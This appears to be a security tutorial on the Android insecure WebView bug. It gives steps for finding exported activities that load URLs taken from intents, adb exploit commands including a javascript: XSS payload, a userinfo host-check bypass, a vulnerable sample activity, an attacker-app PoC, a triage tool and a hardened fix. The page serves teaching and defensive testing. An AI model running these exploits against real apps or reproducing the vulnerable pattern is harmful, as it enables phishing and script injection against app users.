4. Insecure WebView
Methods to find the bug
Rough note:
1. Check AndroidManifest.xml, then the WebView activity (webview.java in the sample below)
2. Open the application in jadx
3. Go to the manifest and check for activities with android:exported="true", or
4. check for an <intent-filter>
5. Confirm the activity either declares android:exported="true" or has an intent filter with an <action android:name="android.intent.action.*" /> element (an activity with an intent filter is exported by default when targetSdkVersion < 31)
6. Search for loadUrl()
7. Check whether the URL passed to loadUrl() comes from the incoming Intent
8. The bug is only reachable from another app if the activity is exported, explicitly or through an intent filter
9. Look for getIntent() / getData() / getDataString() in lifecycle callbacks such as onCreate() and onRestart()
To exploit:
adb shell
am start -a android.intent.action.VIEW -d "https://example.com" com.package.example/.MainActivity -> (package name, a slash, then the activity class; a leading dot means the class is relative to the package)
(or)
am start -a android.intent.action.VIEW -d "https://example.com" -n com.package.example/.MainActivity
Impact: arbitrary URL load (open redirect / phishing inside the app's own UI), XSS via a javascript: URL when JavaScript is enabled, and RCE where the WebView additionally exposes a JavaScript bridge (addJavascriptInterface) or file access to the loaded page; the last two depend on the WebView's settings, not on the exported activity alone.
Bypass for naive host checks: a URL of the form https://trusted-host@attacker-host/ (userinfo before the @; both hostnames here are placeholders) contains the trusted domain as a substring but resolves to attacker-host, so a check that only searches the string for the trusted domain is defeated.
Steps:
1) Open the application in jadx
2) Search for loadUrl()
3) Check that the activity has an intent filter with an <action android:name="android.intent.action.*" /> element or is declared android:exported="true"
4) Check whether the URL passed to loadUrl() comes from the incoming Intent; look in onCreate(), onResume(), onStart(), onRestart() and onNewIntent()
adb exploit (arbitrary URL load): am start -a android.intent.action.VIEW -d "https://karthi-the-hacker.github.io/cv/" -n com.karthithehacker.insecurewebview/.webview
adb exploit (XSS, JavaScript executes in the WebView): am start -a android.intent.action.VIEW -d "javascript:alert(1)" -n com.karthithehacker.insecurewebview/.webview
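The manifest half of the steps above (find activities another app can start, and which of them advertise VIEW with a data URI) can be automated. The following triage tool is an added example, not code from the original page or its author. It assumes a decoded AndroidManifest.xml with the standard android namespace, as jadx shows it; if the <uses-sdk> element is missing (apktool moves those values to apktool.yml) it assumes the pre-31 default, where an intent filter alone makes the component exported.

```java
import java.io.File;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

/**
 * Lists the activities (and activity-aliases) another app can start, from a decoded
 * AndroidManifest.xml. Usage: java ExportedActivityTriage AndroidManifest.xml
 * Added example for triage; assumes the decoded manifest keeps the android namespace.
 */
public class ExportedActivityTriage {
    private static final String ANDROID_NS = "http://schemas.android.com/apk/res/android";
    private static final String ACTION_VIEW = "android.intent.action.VIEW";

    public static void main(String[] args) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setNamespaceAware(true);   // required for getAttributeNS on android:* attributes
        // A hostile manifest must not be able to XXE the triage tool itself.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(new File(args[0]));

        // Before targetSdkVersion 31 a component with an intent filter is exported unless it says otherwise.
        // Assumption: if <uses-sdk> is absent (e.g. apktool output), fall back to that pre-31 default.
        int targetSdk = 0;
        NodeList usesSdk = doc.getElementsByTagName("uses-sdk");
        if (usesSdk.getLength() > 0) {
            String t = ((Element) usesSdk.item(0)).getAttributeNS(ANDROID_NS, "targetSdkVersion");
            if (!t.isEmpty()) targetSdk = Integer.parseInt(t);
        }
        boolean filterImpliesExport = targetSdk < 31;

        for (String tag : new String[] {"activity", "activity-alias"}) {
            NodeList comps = doc.getElementsByTagName(tag);
            for (int i = 0; i < comps.getLength(); i++) {
                report((Element) comps.item(i), tag, filterImpliesExport);
            }
        }
    }

    private static void report(Element comp, String tag, boolean filterImpliesExport) {
        String name = comp.getAttributeNS(ANDROID_NS, "name");
        String exported = comp.getAttributeNS(ANDROID_NS, "exported");   // "" when the attribute is absent
        NodeList filters = comp.getElementsByTagName("intent-filter");
        boolean hasFilter = filters.getLength() > 0;

        boolean reachable = "true".equals(exported)
                || (exported.isEmpty() && hasFilter && filterImpliesExport);
        if (!reachable) return;

        boolean handlesView = false;
        boolean declaresData = false;
        for (int j = 0; j < filters.getLength(); j++) {
            Element filter = (Element) filters.item(j);
            NodeList actions = filter.getElementsByTagName("action");
            for (int k = 0; k < actions.getLength(); k++) {
                Element action = (Element) actions.item(k);
                if (ACTION_VIEW.equals(action.getAttributeNS(ANDROID_NS, "name"))) handlesView = true;
            }
            if (filter.getElementsByTagName("data").getLength() > 0) declaresData = true;
        }

        // Every reachable component is a candidate: an explicit intent (am start -n ...) delivers a
        // data URI regardless of the filter, so VIEW/data only tell you which ones also take implicit intents.
        System.out.printf("%s %s exported=%s intent-filter=%b VIEW=%b data=%b%n",
                tag, name, exported.isEmpty() ? "default" : exported, hasFilter, handlesView, declaresData);
    }
}
```

Each reported component is then opened in jadx to check whether its onCreate()/onNewIntent() feeds getIntent().getData() into loadUrl(); the tool only narrows the list, it does not prove the sink exists.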
Sample vulnerable code:
Package name: com.karthithehacker.insecurewebview
AndroidManifest.xml:
<activity android:name=".webview" android:exported="true"></activity>
or (no exported attribute, but an intent filter, which makes the activity exported by default when targetSdkVersion < 31):
<activity android:name=".webview">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
    </intent-filter>
</activity>
webview.java:
package com.karthithehacker.insecurewebview;

import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

public class webview extends Activity {
    private WebView web;
    private String url;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_webview);
        web = (WebView) findViewById(R.id.web);
        WebSettings webSettings = web.getSettings();
        webSettings.setJavaScriptEnabled(true);      // javascript: URLs and injected scripts will execute
        web.setWebViewClient(new WebViewClient());   // keeps navigation inside the WebView instead of the browser
        url = getIntent().getDataString();           // attacker-controlled once the activity is exported
        if (url != null) {
            web.loadUrl(url); // vulnerable line: no scheme or host validation
        } else {
            web.loadUrl("https://instagram.com/karthi_the_hacker");
        }
    }

    @Override
    public void onBackPressed() {
        if (web.canGoBack()) {
            web.goBack();
        } else {
            super.onBackPressed();
        }
    }
}
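A hardened version of the same activity, added here as an example; it is not the original author's code. It assumes minSdkVersion 24 (for the WebResourceRequest form of shouldOverrideUrlLoading) and an allow-list of instagram.com hosts chosen to match the default URL above; everything else is standard android.webkit API. It rejects non-https schemes (javascript:, file:, intent:, http:), URLs carrying userinfo (the trusted-host@attacker-host trick), backslashes (which Chromium turns into slashes but android.net.Uri does not), and any host that is not an exact allow-list match, and it applies the same check to every later navigation.

```java
package com.karthithehacker.insecurewebview;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

public class webview extends Activity {
    // Assumption: the only hosts this screen may show. Exact matches, never substring checks.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("instagram.com", "www.instagram.com"));
    private static final String DEFAULT_URL = "https://instagram.com/karthi_the_hacker";

    private WebView web;

    /** True only for an absolute https URL without userinfo whose host is exactly allow-listed. */
    static boolean isAllowedUrl(Uri uri) {
        if (uri == null || !uri.isHierarchical()) return false;   // javascript:, intent: etc. are opaque
        if (uri.toString().indexOf('\\') >= 0) return false;       // Chromium reads '\' as '/', Uri does not
        String scheme = uri.getScheme();
        if (scheme == null || !"https".equalsIgnoreCase(scheme)) return false;  // drops http:, file:, content:
        if (uri.getUserInfo() != null) return false;               // https://trusted-host@attacker-host/ bypass
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    private void load(Intent intent) {
        Uri requested = intent == null ? null : intent.getData();
        // Fall back to the default page instead of loading whatever the caller supplied.
        web.loadUrl(isAllowedUrl(requested) ? requested.toString() : DEFAULT_URL);
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_webview);
        web = (WebView) findViewById(R.id.web);

        WebSettings s = web.getSettings();
        s.setJavaScriptEnabled(true);                 // keep only if the allow-listed site needs it
        s.setAllowFileAccess(false);                  // file:// is never a valid target here
        s.setAllowContentAccess(false);               // nor content://
        s.setAllowFileAccessFromFileURLs(false);      // deprecated, still honoured on older devices
        s.setAllowUniversalAccessFromFileURLs(false);

        web.setWebViewClient(new WebViewClient() {
            // Same policy for every later navigation (links, redirects, meta refresh). This callback
            // is not invoked for loadUrl() itself, which is why load() checks before calling it.
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                return !isAllowedUrl(request.getUrl());   // true cancels the navigation
            }
        });

        load(getIntent());
    }

    @Override
    protected void onNewIntent(Intent intent) {       // delivered for singleTop/singleTask launch modes
        super.onNewIntent(intent);
        load(intent);
    }

    @Override
    public void onBackPressed() {
        if (web.canGoBack()) {
            web.goBack();
        } else {
            super.onBackPressed();
        }
    }
}
```

If no other app needs to open this screen, also set android:exported="false" on the activity in the manifest; the URL check then becomes defence in depth rather than the only barrier.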
Exploit code (a separate attacker app; its activity starts the exported webview component with an attacker-chosen URI):
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class MainActivity extends Activity {   // class name is a placeholder
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_webview);
        Intent data = new Intent();
        // Explicit intent: no action or category needed, the target only has to be exported
        data.setClassName("com.karthithehacker.insecurewebview",
                "com.karthithehacker.insecurewebview.webview");
        data.setData(Uri.parse("http://cappriciosec.com/"));
        startActivity(data);
    }
}
PoC 1: screenshot (image not included)
PoC 2 to PoC 5: screenshots (images not included)
OPPO Insecure WebView
